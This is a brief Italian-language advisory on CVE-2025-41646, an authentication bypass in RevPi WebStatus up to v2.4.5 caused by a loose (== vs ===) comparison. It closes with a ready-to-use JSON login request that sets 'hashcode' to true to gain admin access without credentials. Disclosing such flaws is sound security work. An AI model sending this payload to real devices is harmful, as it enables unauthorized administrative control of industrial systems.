
CVE-2025-41646 - Bypass critico dell'autenticazione
CVE-2025-41646 - Bypass critico dell'autenticazione
Una vulnerabilità critica di bypass dell'autenticazione (CVE-2025-41646) in RevPi WebStatus ≤ v2.4.5 consente a un attaccante di accedere come admin senza credenziali valide a causa di una logica di confronto di tipo debole (== vs ===).
Invia una richiesta di login con:
{
"mode": "LOGIN",
"username": "admin",
"hashcode": true
}